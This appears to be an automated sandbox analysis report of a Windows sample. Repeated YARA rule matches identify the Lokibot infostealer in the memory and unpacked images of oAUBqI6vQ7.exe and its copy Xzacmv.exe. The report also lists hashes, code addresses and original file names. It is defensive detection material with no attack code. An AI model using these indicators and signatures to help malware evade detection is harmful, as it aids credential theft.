Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: oAUBqI6vQ7.exe PID: 7616, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Xzacmv.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Xzacmv.exe PID: 4900, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_018F4218	0_2_018F4218
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_018F4B00	0_2_018F4B00
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_018F6F93	0_2_018F6F93
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_018FD424	0_2_018FD424
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_057A0078	0_2_057A0078
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_057A0088	0_2_057A0088
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07620FF8	0_2_07620FF8
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07620FC0	0_2_07620FC0
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DEB6E8	0_2_07DEB6E8
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE3E1F	0_2_07DE3E1F
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE3E30	0_2_07DE3E30
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE25F0	0_2_07DE25F0
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE2A28	0_2_07DE2A28
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Code function: 0_2_07DE6818	0_2_07DE6818
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_02804218	10_2_02804218
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_02806F92	10_2_02806F92
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_0280D424	10_2_0280D424
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD3E30	10_2_06FD3E30
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD3E1F	10_2_06FD3E1F
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD25F0	10_2_06FD25F0
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FDAA80	10_2_06FDAA80
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD2A28	10_2_06FD2A28
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 10_2_06FD2A18	10_2_06FD2A18
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 15_2_0040549C	15_2_0040549C
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: 15_2_004029D4	15_2_004029D4

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Code function: String function: 00405B6F appears 42 times

Source: oAUBqI6vQ7.exe, 00000000.00000002.1429235724.0000000004302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000002.1429235724.0000000004302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000002.1434637871.0000000005B60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000002.1436394681.0000000007E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000000.1368890403.0000000000F1A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerKApz.exe> vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000002.1435563077.0000000007580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerKApz.exe> vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe, 00000000.00000002.1425793210.000000000154E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs oAUBqI6vQ7.exe
Source: oAUBqI6vQ7.exe	Binary or memory string: OriginalFilenamerKApz.exe> vs oAUBqI6vQ7.exe

Source: oAUBqI6vQ7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
